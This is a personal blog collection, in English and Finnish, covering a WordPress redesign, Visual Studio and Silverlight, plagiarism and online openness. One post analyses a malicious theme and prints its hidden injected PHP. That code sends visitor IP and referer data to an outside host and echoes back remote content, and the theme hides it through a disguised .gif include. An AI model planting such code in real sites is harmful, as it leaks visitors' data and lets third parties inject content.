Blog 1.0 appearance

Simple blog appearence upgrade project has take something like 6 hours and still some more stuff need to be done.

Main reason of the project delays has come from the bad quality of new theme files. Theme demo looked at first glimpse it seemed to be done by profs, but the implementation proved me wrong.

When I had installed the theme files into wordpress, I got problem that I have descriped in my previous blog post HireWordPressExperts.com has excellent themes…for me to poop on.

Most of the delays were caused the theme was not created using web standards. There were over 20 severe warnings when I tried to run my new site through W3C HTML Validator. Many of the warnings were caused of missing eng tag or ul tag inside of another ul tag.

After fixing the html, hole layot crashed and I have to start from begining to styling structure.

It’s  away over the midnight, but I’m pretty happy about the result. I hope you also enjoyed!

Blog 1.0 (old)

Blog 1.1 (new)

Warning: URL file-access is disabled in the server configuration

After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…

Warning directed me to look script from general-template.php file and I found suspicious script:

/*** HWEDLC ***/
…
$url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
$content = file_get_contents($url);
echo  $content;

After removing the script and refresing browser warning was gone, but second refresh brought back the same warning

I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.

In the end solution was quite simple:

• Remove wp.gif file
• Remove  include or require command from functions.php
• Clean the get_footer function from wp-includes/general-template.php file

I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.

Would you hire “experts” that are using this kind of marketing strategies?

Blog 1.0 -> Blog 1.1

The blog has gone through some sort of rebirth. It’s got a new look, title and some other stuff, but the biggest change will be some sort of language change. I will be writing in english at least the articles of software developement.

November Humppa Calendar

What’s your humppa name?

Humppa name consist of your second name and the last name of your mother’s maiden name.
Humppa name is also called as tango name and as artist name

http://humppanimi.com/

“Danger is my middle name”
-Austin Powers

Actually danger (Danger in finnish = Vaara) is my last name, but I believe I’m just as dangerous and charming as Austin Powers.

Visual Studio 2010 beta 2 julkaistiin juuri testattavaksi. Ensivaikutelma on positiivinen ja tuntuu pysyvän paremmin pystyssäkin kuin beta 1.

Varoitukseksi kuitenkin:

Yksi ilta kului pelkästään Beta 1:sen poistamiseen. Syynä osittain liialti ikää kerennyt Dell:in läppäri, mutta ei sitäkään kaikesta voi syyttää.
Suosittelen kuitenkin kaikkien varaamaan reilusti aikaan beta 2:sen asennukseen. Se tuskin tulee onnistumaan parissa minuutissa.

Samalla voi nauttia, vaikka beta 2 uusista hienoista ominaisuuksista ja ohjeista:

• How to install beta 2 (Video)
  
• First look (Video)
  
• Uudistuneesta ulkoasusta
• TFS on tuotu osaksi Visual Studiota, jos TFS ei ole tuttu, niin katso lyhyt tutoriaali TFS:stä
• Parantuneet työkalut UML-kielen hyötykäyttöön

Mitenköhän tekijänoikeuslait kohtelisivat henkilöä, joka on julkaissut ns. plagioitua materiaalia, mutta ei olisi itse kuitenkaan hyödyn saaja?

Aikaisempaan postaukseeni (Plagiointi, soveltaminen vai luominen) liittye. Tässä on mielestäni hyvä esimerkki siitä kuinka oikeasti tuotetaan paljon lisä-arvoa “plagioinnilla”, mutta ei edes itselle.

• Videon on julkaissut ja leikannut henkilö nimimerkillä tubelookjohn
• Kuvat on todennäköisesti kerätty useasta eri lähteestä ja kuvaajalta
• Laulanut Michael Londra
• Kappaleen soittajia, sanoittajia tai säveltäjiä ei ole muistettu mainita

Hyötyjä on kuitenkin koko Irlannin matkailu. Mulle ainakin tuli tarve päästä tuonne.

Huomioikaa videon katsojaluvut. Tällä hetkellä 1 674 850. En osaa itse edes kuvitella mitä maksaisi TV-mainos, jonka katsoisi yhtä monta katsojaa ja vielä omasta halustaan. Sen mainosarvoa tuskin voi edes mitata.

Ongelmana tällä kertaa on plagioinnin ja inventioinnin raja. Eli milloin ollaan kopioimassa sisältöä, milloin soveltamassa sitä ja milloin luomassa jotain täysin uutta.

Esimerkiksi olen valinnut seuraavan videon, jossa kappaleesta Drunken Sailor on tehty video. Jos vaikka YLE haluaisi näyttää kyseisen videon uutisissa, niin keneltä YLE:n pitäisi kysyä lupaa videon esittämiseen?

1. shadowelf994, joka on videon julkaisijan nimimerkki?
2. Tekno version tuottaja?
3. Joku muu niistä kymmenistä muista kappaleen plagioijista, jotka ovat auttaneet kappaleen tuomisessa julkisuuden tietoon?
4. Koko englannin kuninkaallinen laivasto, koska he lauloivat kappaletta ja levittivät tietoisuutta ympäri maailman (lähde: wiki)?
5. Jokseenkin samanlaisen kappaleen ensimmäisen version tuottaja (josta ei ilmeisesti ole tietoa)?
6. Kappaleen melodia on otettu vanhasta irlantilaisesta marssimusiikista nimelle Óró, niin tämän rytmin/musiikin kehittäjälle (lähde: (wiki)?

Oikein vastanneiden kesken arvotaan vierailu Teosto r.y.:n verkkosivuille.

Tuli vähän leikittyä silverlight 3:lla ja törmäsin outoon virheeseen:

AG_E_PARSER_BAD_PROPERTY_VALUE
[Line: 18 Position: 146]

Selvisi että kyseessä oli vain väärin kirjoitettu eventin nimi XAML-tiedostossa, mutta saako sen tuosta virheilmoituksesta selville. Näyttä siltä että kehittäjä olisi heittänyt vain jonkin constant muutujan, joka olisi pitänyt korvata selkokielisellä virheellä. Tosin sekään tuskin olisi paljoa auttanut, kun ei tiedostoa virheessä mainita.  Rivinumero tosin osui aivan oikeaan, mutta itse lähdin etsimään virhettä code behindin puolelta.

Pelottavaa ajatella ettei eventtien virheilmoituksia ole saatu kuntoon, joka on hyvinkin yksinkertaisia ominaisuuksia kun alkaa vertaamaan joihinkin täysin uusiin palveluihin (esim. RIA-Services).

Moni on varmaan huomannut jo saman, että nykyään verkossa ihmiset esittäyvät yhä useammin oikealla nimellään eikä nimimerkillä (esim. Facebook, Messenger). Nimi merkin takaa olisi paljon helpompi ja vapaampi kirjoitella mitä ikinä mieleen juolahtaa.

Itse olen avoimuuden kannattaja, niin pienissä kuin suurissakin asioissa. Mielestäni avoin suhtautuminen asioihin  sopii melkein poikkeuksetta paremmin kuin sulkeutunut tai teennäinen:

• Nimimerkki vs. oma nimi
• Yrityksen kommunikointi sisäisesti tai asiakkaille
• Hallituksen tai eduskunnan politiikka, puolueiden  rahoitus sekä viestintä

On helppo sanoa kumpi sanoista avoimuus ja sulkeutuneisuus on oikeaa ja kumpi “väärä”, mutta sen toteuttaminen on aivan toinen asia.

P.s. Tätä ei ole kirjoitettu anonyymillä nimimerkillä, vaan erään persoonani näkökannalta.